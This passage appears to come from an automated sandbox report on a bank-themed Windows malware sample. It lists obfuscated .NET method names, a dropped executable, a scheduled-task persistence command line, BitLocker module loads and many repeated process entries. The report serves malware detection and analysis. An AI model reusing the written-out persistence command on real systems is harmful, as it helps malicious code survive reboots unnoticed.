Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, tyXDLRpfYlQ2iT9RGj.cs	High entropy of concatenated method names: 'ShVtD2PtWR', 'tM7tZXgLEs', 'KoetjOSJB0', 'RlYt9792rA', 'p0stgmdwSL', 'pCAtR2ks6U', 'wR8smUlQqrluj4uv2e', 'gsLWqwgOh7w7V4tHpP', 'kh8ttM2Win', 'uQutMQIlAt'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, kVqatYrTNB5m8YTmaE.cs	High entropy of concatenated method names: 'ToString', 'IQ5Rm29Tkv', 'xwaR3ZxN7D', 'UJpRF9kgS5', 'FeORJ60lND', 'eJMRPgVRWy', 'hh1Rfn8d5h', 'u1wRsewFjN', 'uMlRB1EmXj', 'JX3Rul5r4q'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, SgBVfdGPMnyAiX4E3E.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'teuiVa8aI2', 'mLBiy6AFJE', 'O7qizDnmhH', 'jPbMvR4kXy', 'C2YMtJqWHU', 'yKBMiw8d1o', 'WnkMM79Yhk', 'T9WoxEj10i2uCMW3IgU'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, E4pxDVsdf93dcIK1T4.cs	High entropy of concatenated method names: 'gEtDSdmnMu', 'FaiDGff4Ph', 'nX7DQc15BA', 'LrnQyodmSW', 'UOJQzqAB5I', 'wrtDvDs0Au', 'bXeDtbU68i', 'gLRDiiOyOh', 'kOLDMBb5Pc', 'j5wDppHa4x'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, Vpq0WhJdv9bHlWPhF8.cs	High entropy of concatenated method names: 'x1iQK7C2XJ', 'ugcQdiq7A1', 'SCnQcQQoW5', 'P0PQqLvSFM', 'hg2Q4krnjt', 'oMyQ1f3e7a', 'Fo0Q0c3X6a', 'FJIQLDqaBK', 'SwYkSt799u7nDhqsETA', 'lPymrO7FNxRyy7BsraX'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, A8HxhQAA0ugxwbQ6Kw.cs	High entropy of concatenated method names: 'LyxEgdCkMP', 'ewFEYeyrdX', 'r2QEExiEZE', 'HI4EntmvQP', 'dJMExXIEtq', 'pm9EKSDxde', 'Dispose', 'RBXbS5HZw7', 'i4FbwKsKaV', 'mZPbGgYl1G'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, FplIaptp9erPBeVXkwT.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YxOeEwNDer', 'p9veOfWAT4', 'r8senpm1KA', 'V5See34x22', 'aHkexgegaG', 'YC4eI5x75q', 'njeeKiD6uP'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, xVB0TZzo6Y9IDP0lK3.cs	High entropy of concatenated method names: 'JKhO4Syf1Q', 'qZHO8nHvLw', 'ExdO0CUiVW', 'qSgOoexEhM', 'cd3O3S92A1', 'owPOJNI0qZ', 'FdYOPhrnnB', 'idROKNyb2v', 'lVSOdWCV3s', 'kybO7tLnij'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, WKZ2ys0oeOSJB02lY7.cs	High entropy of concatenated method names: 'CQ8Gq2kUKJ', 'MPHG4Sgv4d', 'kfMG8hUhm0', 'plmG0x0mc8', 'PKgGgciojX', 'QZoGR3V391', 'FIkGY8DB8Q', 'vuMGbfaAj1', 'Wk2GEg6TWi', 'JXtGOZLCKr'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, QyKpIStM0exlkftiGxj.cs	High entropy of concatenated method names: 'f90nyHd6iA', 'HsJnzBLTQJ', 'MCjevY9Ey6', 'orKVTp1t7oGHYWhtsVt', 'l7mwUr17ImvckZvh3EY', 'sEBKGL1GyOYX4rjDMcA', 'eWnK1f11CWQbeV07C8P'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, POQYhVu3cvE6cDmFGJ.cs	High entropy of concatenated method names: 'bKNDdv0DQm', 'QIjD7SPkHE', 'xXnDcbShch', 'b7uDqe2R43', 'V5hDamXu36', 'VMgD4E6xZk', 'Sf2D1dLkkx', 'CNgD8D4pCI', 'W6dD0y36Cl', 'eJeDLyNPZN'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, NL3VQZfQOXbtAH2bcc.cs	High entropy of concatenated method names: 'D2oQrXGFSO', 'QYVQWXjVTO', 'jxKQ5Qwv7h', 'ToString', 'SxpQkqdc6t', 'mo8QAeC1vO', 'wZIPwL7KtcB7JtYxoAk', 'DWH2E07h8TugABKyEfc', 't2RudB7aToU27c9GJep'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, ANDKXllOPerWYQIQNw.cs	High entropy of concatenated method names: 'VqIU8yiu3Q', 'N87U0wGnqe', 'qEtUoDQtDA', 'rHnU31gKVk', 'HKXUJyujPC', 'QNVUP6ALe4', 'ndlUshZQf7', 'VXEUBD9dyb', 'DbnUHNqk56', 'nn2UmLkxED'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, X2PtWR8nM7XgLEsiB1.cs	High entropy of concatenated method names: 'owiw26I08U', 'hZcw6BFuof', 'I1Awr7Evc1', 'sRpwW0XYsm', 'z1ew5PKgnQ', 'If3wkmi4Ng', 'DXswAlThxK', 'NU7whyVbhD', 'nt6wVLrU0Q', 'vdSwyXLA0q'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, YgONXxyGkWEK9kKFEi.cs	High entropy of concatenated method names: 'bu7OGruICi', 'MYTOCcnIDF', 'v5sOQn3WVP', 'nboODY3ejQ', 'F7GOECk4Ib', 'tBWOZEIF2Z', 'Next', 'Next', 'Next', 'NextBytes'
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, nRi2E6kBg4bm6wJjV9.cs	High entropy of concatenated method names: 'OifYhIbOnp', 'tZ3YyfuZHT', 'sh7bvnyeTg', 'y5PbtQomU8', 'XQZYmJe1dx', 'LYgYXwAKdp', 'nZvYlBWFXm', 'opHY2Dpfnf', 'ktDY6QTRmt', 'CcrYrsGyym'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, YCLcRCtv5hOGbAklTW9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UoUOmJ3V52', 'LOrOX1piYl', 'MUyOlLwudR', 'PqHO2Gu1PS', 'v3wO6ZQrCb', 'IqgOrSY33X', 'emmOWN0vKe'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, tMr0sf2ktQ0cqReIDA.cs	High entropy of concatenated method names: 'FQ1gH0gFbh', 'u1JgXLubl8', 'aPBg2Ekd0a', 'nDWg6FLEQu', 'poMg3TytSO', 'W1QgFXCJTp', 'aJDgJP2L8n', 'XUOgP8cR7G', 'cUrgfRXeB7', 'KNXgsjbWLK'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, n2rATXL28KV38R0smd.cs	High entropy of concatenated method names: 'mxvCaaZbhf', 'cJ8C161DYd', 'AR0GFRLX99', 'YVLGJKlEFZ', 'H3oGPPtHFX', 'kXhGfByKEy', 'rq3GsUTyJN', 'AFFGBuvqSV', 'dflGuKwCLX', 'rZ3GH6NZxs'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, eoHKWGipIdfiIN6Q0L.cs	High entropy of concatenated method names: 'Qm9cH5DoZ', 'kEtqOnrMO', 'fVi4B5fTA', 's7k1ha2GQ', 'qhS0acxga', 'K68LCWnBl', 'gN9mL4Rm7pIFXE8dpc', 'q7unU5sQ71OW9qUQvZ', 'ytJbETsbo', 'Q38OCcW9H'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, VbcBBJZsw7O8CJjepm.cs	High entropy of concatenated method names: 'vUeMTsG7Yg', 'yBsMSQ9qcu', 'bEnMwxbp89', 'fZ7MGkbFIV', 'x3dMCMW7Qh', 'TDAMQiEV6I', 'yByMDGtIK5', 'RXBMZLLlFV', 'Is9MNBucli', 'RWGMjtx0Q6'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, gSLYCAo2ks6U0tcLN5.cs	High entropy of concatenated method names: 'vJXQTpmxhP', 'QnHQwPAVPB', 'hacQCYnS4C', 'Ho0QDIS61H', 'cLNQZHAZMD', 'Jl1C5jbqAA', 'WWwCkuuU41', 'e7ACASsAtJ', 'HGdChbG8wD', 'D5ACVhboJc'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, Y95DWNwh79jC0AXIjs.cs	High entropy of concatenated method names: 'Dispose', 'MgxtVwbQ6K', 'b9vi35gSNy', 'tq00rvlqli', 'gk5tyQQJS6', 'WrmtzZKtJt', 'ProcessDialogKey', 'hHTiv6HXlj', 'xEjitGQdSC', 'QZeiiygONX'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, yXQVoVttah0gwrnpmqH.cs	High entropy of concatenated method names: 'vFQOyBiCh9', 'sToOzL9rP2', 'AxPnviZtKE', 'leWntKl2Ei', 'gC4nimkrjK', 'cpmnMrL2f5', 'T9pnpkZsS4', 'KoYnTJiKNK', 'SpsnSFdlwl', 'D6qnwUG6GS'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, e6HXljVdEjGQdSClZe.cs	High entropy of concatenated method names: 'UDgEoPs2XW', 'OU2E3AYO1D', 'BbREF2U7bp', 'JQCEJ4iy1q', 'WFyEPKeX3t', 'O2TEfYysit', 'j83EsbKgwM', 'toMEBglOtK', 'CTAEuIefHK', 'kZcEH5fiG4'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, tyXDLRpfYlQ2iT9RGj.cs	High entropy of concatenated method names: 'ShVtD2PtWR', 'tM7tZXgLEs', 'KoetjOSJB0', 'RlYt9792rA', 'p0stgmdwSL', 'pCAtR2ks6U', 'wR8smUlQqrluj4uv2e', 'gsLWqwgOh7w7V4tHpP', 'kh8ttM2Win', 'uQutMQIlAt'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, kVqatYrTNB5m8YTmaE.cs	High entropy of concatenated method names: 'ToString', 'IQ5Rm29Tkv', 'xwaR3ZxN7D', 'UJpRF9kgS5', 'FeORJ60lND', 'eJMRPgVRWy', 'hh1Rfn8d5h', 'u1wRsewFjN', 'uMlRB1EmXj', 'JX3Rul5r4q'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, SgBVfdGPMnyAiX4E3E.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'teuiVa8aI2', 'mLBiy6AFJE', 'O7qizDnmhH', 'jPbMvR4kXy', 'C2YMtJqWHU', 'yKBMiw8d1o', 'WnkMM79Yhk', 'T9WoxEj10i2uCMW3IgU'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, E4pxDVsdf93dcIK1T4.cs	High entropy of concatenated method names: 'gEtDSdmnMu', 'FaiDGff4Ph', 'nX7DQc15BA', 'LrnQyodmSW', 'UOJQzqAB5I', 'wrtDvDs0Au', 'bXeDtbU68i', 'gLRDiiOyOh', 'kOLDMBb5Pc', 'j5wDppHa4x'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, Vpq0WhJdv9bHlWPhF8.cs	High entropy of concatenated method names: 'x1iQK7C2XJ', 'ugcQdiq7A1', 'SCnQcQQoW5', 'P0PQqLvSFM', 'hg2Q4krnjt', 'oMyQ1f3e7a', 'Fo0Q0c3X6a', 'FJIQLDqaBK', 'SwYkSt799u7nDhqsETA', 'lPymrO7FNxRyy7BsraX'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, A8HxhQAA0ugxwbQ6Kw.cs	High entropy of concatenated method names: 'LyxEgdCkMP', 'ewFEYeyrdX', 'r2QEExiEZE', 'HI4EntmvQP', 'dJMExXIEtq', 'pm9EKSDxde', 'Dispose', 'RBXbS5HZw7', 'i4FbwKsKaV', 'mZPbGgYl1G'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, FplIaptp9erPBeVXkwT.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YxOeEwNDer', 'p9veOfWAT4', 'r8senpm1KA', 'V5See34x22', 'aHkexgegaG', 'YC4eI5x75q', 'njeeKiD6uP'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, xVB0TZzo6Y9IDP0lK3.cs	High entropy of concatenated method names: 'JKhO4Syf1Q', 'qZHO8nHvLw', 'ExdO0CUiVW', 'qSgOoexEhM', 'cd3O3S92A1', 'owPOJNI0qZ', 'FdYOPhrnnB', 'idROKNyb2v', 'lVSOdWCV3s', 'kybO7tLnij'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, WKZ2ys0oeOSJB02lY7.cs	High entropy of concatenated method names: 'CQ8Gq2kUKJ', 'MPHG4Sgv4d', 'kfMG8hUhm0', 'plmG0x0mc8', 'PKgGgciojX', 'QZoGR3V391', 'FIkGY8DB8Q', 'vuMGbfaAj1', 'Wk2GEg6TWi', 'JXtGOZLCKr'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, QyKpIStM0exlkftiGxj.cs	High entropy of concatenated method names: 'f90nyHd6iA', 'HsJnzBLTQJ', 'MCjevY9Ey6', 'orKVTp1t7oGHYWhtsVt', 'l7mwUr17ImvckZvh3EY', 'sEBKGL1GyOYX4rjDMcA', 'eWnK1f11CWQbeV07C8P'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, POQYhVu3cvE6cDmFGJ.cs	High entropy of concatenated method names: 'bKNDdv0DQm', 'QIjD7SPkHE', 'xXnDcbShch', 'b7uDqe2R43', 'V5hDamXu36', 'VMgD4E6xZk', 'Sf2D1dLkkx', 'CNgD8D4pCI', 'W6dD0y36Cl', 'eJeDLyNPZN'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, NL3VQZfQOXbtAH2bcc.cs	High entropy of concatenated method names: 'D2oQrXGFSO', 'QYVQWXjVTO', 'jxKQ5Qwv7h', 'ToString', 'SxpQkqdc6t', 'mo8QAeC1vO', 'wZIPwL7KtcB7JtYxoAk', 'DWH2E07h8TugABKyEfc', 't2RudB7aToU27c9GJep'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, ANDKXllOPerWYQIQNw.cs	High entropy of concatenated method names: 'VqIU8yiu3Q', 'N87U0wGnqe', 'qEtUoDQtDA', 'rHnU31gKVk', 'HKXUJyujPC', 'QNVUP6ALe4', 'ndlUshZQf7', 'VXEUBD9dyb', 'DbnUHNqk56', 'nn2UmLkxED'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, X2PtWR8nM7XgLEsiB1.cs	High entropy of concatenated method names: 'owiw26I08U', 'hZcw6BFuof', 'I1Awr7Evc1', 'sRpwW0XYsm', 'z1ew5PKgnQ', 'If3wkmi4Ng', 'DXswAlThxK', 'NU7whyVbhD', 'nt6wVLrU0Q', 'vdSwyXLA0q'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, YgONXxyGkWEK9kKFEi.cs	High entropy of concatenated method names: 'bu7OGruICi', 'MYTOCcnIDF', 'v5sOQn3WVP', 'nboODY3ejQ', 'F7GOECk4Ib', 'tBWOZEIF2Z', 'Next', 'Next', 'Next', 'NextBytes'
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, nRi2E6kBg4bm6wJjV9.cs	High entropy of concatenated method names: 'OifYhIbOnp', 'tZ3YyfuZHT', 'sh7bvnyeTg', 'y5PbtQomU8', 'XQZYmJe1dx', 'LYgYXwAKdp', 'nZvYlBWFXm', 'opHY2Dpfnf', 'ktDY6QTRmt', 'CcrYrsGyym'

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

File created: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
